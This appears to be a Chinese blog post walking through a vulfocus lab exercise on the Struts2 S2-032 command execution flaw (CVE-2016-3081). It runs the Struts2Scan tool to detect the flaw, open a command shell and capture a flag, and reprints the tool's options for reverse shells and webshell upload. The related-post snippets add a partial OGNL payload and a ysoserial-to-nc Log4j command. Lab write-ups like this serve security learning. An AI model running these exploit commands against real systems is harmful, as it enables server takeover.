vulfocus-struts2 命令执行 (CVE-2016-3081)

已于 2022-06-16 15:12:32 修改
阅读量1.8k 收藏 2
点赞数
分类专栏: vulfocus 文章标签: struts 安全 web安全
于 2022-06-16 15:11:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fanny0602/article/details/125315842
版权

名称: struts2 命令执行 (CVE-2016-3081)

靶场环境:

https://vulfocus.cn/#/dashboard?image_id=d11ef86e-37bb-4001-99a4-b3e92ce39e17

描述:

S2-032漏洞的影响范围是Struts 2.3.20 - Struts Struts 2.3.28,当开启了动态方法调用时可RCE。这次的漏洞分析以及后面的漏洞分析都是使用的Struts 2.3.24。在我们的第一篇文章中就讲过invokeAction方法是真正执行action中方法的地方,而低版本中式通过反射的方法来执行的,高版本中式通过Ognl表达式执行的,所以这次的S2-032并不影响低版本的Struts2。

漏洞复现

1.打开靶场环境
在这里插入图片描述

2.使用工具进行检测,确定漏洞存在。

python3 Struts2Scan.py -u http://123.58.236.76:48132/

3.漏洞存在,指定漏洞名称进行漏洞利用。

python3 Struts2Scan.py -u http://123.58.236.76:48132/  -n  S2-032 -e

4.拿到flag

flag-{bmhcb76e03e-f539-44df-8ba0-ecc2a9881f18}

在这里插入图片描述
在这里插入图片描述

Struts2Scan简单使用

github地址

https://github.com/HatBoy/Struts2-Scan

下载

git clone https://github.com/HatBoy/Struts2-Scan.git

# 进入项目路径
cd Struts2Scan

简单使用

Usage: Struts2Scan.py [OPTIONS]

  Struts2批量扫描利用工具

Options:
  -i, --info          漏洞信息介绍
  -v, --version       显示工具版本
  -u, --url TEXT      URL地址
  -n, --name TEXT     指定漏洞名称, 漏洞名称详见info
  -f, --file TEXT     批量扫描URL文件, 一行一个URL
  -d, --data TEXT     POST参数, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}
  -c, --encode TEXT   页面编码, 默认UTF-8编码
  -p, --proxy TEXT    HTTP代理. 格式为http://ip:port
  -t, --timeout TEXT  HTTP超时时间, 默认10s
  -w, --workers TEXT  批量扫描进程数, 默认为10个进程
  --header TEXT       HTTP请求头, 格式为: key1=value1&key2=value2
  -e, --exec          进入命令执行shell
  --webpath           获取WEB路径
  -r, --reverse TEXT  反弹shell地址, 格式为ip:port
  --upfile TEXT       需要上传的文件路径和名称
  --uppath TEXT       上传的目录和名称, 如: /usr/local/tomcat/webapps/ROOT/shell.jsp
  -q, --quiet         关闭打印不存在漏洞的输出,只保留存在漏洞的输出
  -h, --help          Show this message and exit.

查看基本信息

python3 Struts2Scan.py --info

# 单目标检测
python3 Struts2Scan.py -u url

# 多目标检测
python3 Struts2Scan.py -f urls.txt

# 指定漏洞名称利用,命令执行
python3 Struts2Scan.py -u url -n S2-032 -e
N0mo
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Apache Struts 远程代码执行漏洞(CVE-2016-3081)复现
锋刃科技的博客
03-05 2106
影响版本 Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28 漏洞概述 远程用户可以向已启用动态方法调用以在目标系统上执行任意代码的目标服务器提供包含“method:”前缀的巧尽心思构建的表达式 环境搭建 下载地址 http://archive.apache.org/dist/struts/2.3.20/ 这里下载的是struts-2.3.20-apps.z...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Struts2方法调用远程代码执行漏洞(CVE-2016-3081)分析
weixin_33708432的博客
03-08 642
绿盟科技 · 2016/04/26 18:070x00 漏洞简述2016年4月21日Struts2官方发布两个CVE,其中CVE-2016-3081官方评级为高。主要原因为在用户开启动态方法调用的情况下,会被攻击者实现远程代码执行攻击。从我自己搜索的情况来看,国内开启这个功能的网站不在少数,所以这个“Possible Remote Code Execution”漏洞的被打的可能性还是很高的。0x0...
vulhub靶机struts2环境下的s2-032(CVE-2016-3081)(远程命令执行漏洞)
最新发布
m0_73248913的博客
05-13 255
当用户提交表单数据并验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。Struts 2.3.19至2.3.20.2、2.3.21至2.3.24.1和2.3.25至2.3.28。如果返回的页面出现异常,则可以认定为目标是基于 Struts2 构建的。2、 页面上输出了与业务有关错误消息,或者 1111 被回显到了页面上。1、 页面直接出现 404 或者 500 等错误。3、 页面的内容结构发生了明显的改变。4、 页面发生了重定向。
Struts2 S2 – 032远程代码执行漏洞分析报告 .
fin86889003的专栏
06-07 663
Struts2 S2 – 032远程代码执行漏洞分析报告 一、漏洞基本信息 CVE编号:CVE-2016-3081 漏洞名称:Struts2 S2 – 032远程代码执行 漏洞发布日期:2016.4.15 受影响的软件及系统:Struts2版本:Struts2 2.0.0 -2.3.28( 2.2.3(2.3.20.2和2.3.42.2不受影响) 漏洞概述:Apache Str
vulhub中Struts2-032 远程代码执行漏洞复现(CVE-2016-3081
yougexiaojiuguan的博客
04-07 455
漏洞复现过程的记录
CVE-2016-3081
龙卷风摧毁停车场
02-27 440
Struts是Apache基金会的一个开源项目,Struts通过采用Java Servlet/JSP技术,实现了基于Java EE Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品。目前,Struts框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用,是应用最广泛的Web应用框架之一。Apache Struts 2中存在安全漏洞。
Apache Struts 远程代码执行漏洞(CVE-2016-3081)
Darklord.W
10-20 1802
漏洞简介 漏洞描述 Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions. 影响范围 Apach...
S2-032 远程代码执行漏洞(CVE-2016-3081
EC_Carrot的博客
08-11 384
漏洞简介 影响版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-032/README.zh-cn.md 漏洞复现 直接请求如下URL,即可执行id命令: http://your-ip:8080/index.action?method:%23_memberAccess%3d@ognl.OgnlCo
S2-032远程执行代码漏洞(CVE-2016-3081
m0_65150886的博客
01-09 438
国内安全企业安恒信息的安全研究员Nike.zheng在Struts 2上发现存在高危安全漏洞(CVE-2016-3081,S02-32),黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有struts版本。借此漏洞,攻击者可以继承Web服务程序的权限去执行系统命令(任意代码)或读写文件;Apache Struts 2是世界上最流行的Java Web服务器框架之一。1.访问http://ip:port,出现如下页面,开始实验。
vulfocus靶场struts2 命令执行 CVE-2016-3081
没有故事
04-23 418
后面接payload。Struts 2服务器上执行任意代码,取得网站服务器控制权。payload: 红色部分为可替换的执行命令。远程攻击者利用漏洞可。
struts2 cve-2016-3081 BUG版本升级整理
05-06
cve-2016-3081 BUG版本升级整理,里面有Struts 2.1.8 升级 Struts 2.3.28需要替换的jar包,如不是2.1.8的可以做一个简单的参考。可能每个人中引用的jar包不同,但通过参考能节省调试时间,希望对大家有帮助
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
Struts2 S2 – 032远程代码执行漏洞分析报告
热门推荐
煜铭2011
04-30 1万+
Struts2 S2 – 032远程代码执行漏洞分析报告 一、漏洞基本信息 CVE编号:CVE-2016-3081 漏洞名称:Struts2 S2 – 032远程代码执行 漏洞发布日期:2016.4.15 受影响的软件及系统:Struts2版本:Struts2 2.0.0 -2.3.28( 2.2.3(2.3.20.2和2.3.42.2不受影响) 漏洞概述:Apache Struts 2...
Java中的Struts是什么?如何使用Struts
2301_77769537的博客
05-14 2294
因此,Action类是应用程序的核心组件之一,它将用户请求与应用程序逻辑和视图进行交互,并提供灵活性和可扩展性。接下来,您需要在应用程序中配置Struts的XML文件,以指定应用程序的Model,View和Controller。因此,使用Web服务器运行应用程序可以使应用程序更加灵活方便,并提供更多的交互方式,使用户可以更加方便地使用应用程序。综上所述,Struts是一种功能强大,灵活,可靠的Web应用程序框架,可以帮助开发人员更轻松地构建和管理Web应用程序,并保护其免受恶意攻击和错误数据的影响。
[Vulfocus解题系列] Struts2-052远程代码执行漏洞(CVE-2017-9805)
00勇士王子的博客
07-14 2221
漏洞介绍 名称: struts2-052 远程代码执行CVE-2017-9805) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。REST plugin是其中的一个处理传入URL请求的插件。 攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行
struts2 代码执行CVE-2020-17530)s2-061
YouthBelief的博客
11-07 647
struts2 代码执行CVE-2020-17530)struts2 代码执行CVE-2020-17530)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 struts2 代码执行CVE-2020-17530) Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 在特定的环境下,远程攻击者通过构造 恶意的OGNL表达式 ,可造成 任意代
Log4j-CVE-2017-5645
10-05
Log4j-CVE-2017-5645是指Apache Log4j 2.x版本中存在的安全漏洞。攻击者可以利用该漏洞执行任意代码。为了利用该漏洞,攻击者可以使用ysoserial生成payload,并发送到受影响的Log4j服务器。具体操作可以使用以下命令: java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-5645_is_success" | nc 192.168.1.240 4712 这个命令将创建一个名为CVE-2017-5645_is_success的文件,并发送到IP地址为192.168.1.240,端口号为4712的Log4j服务器。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值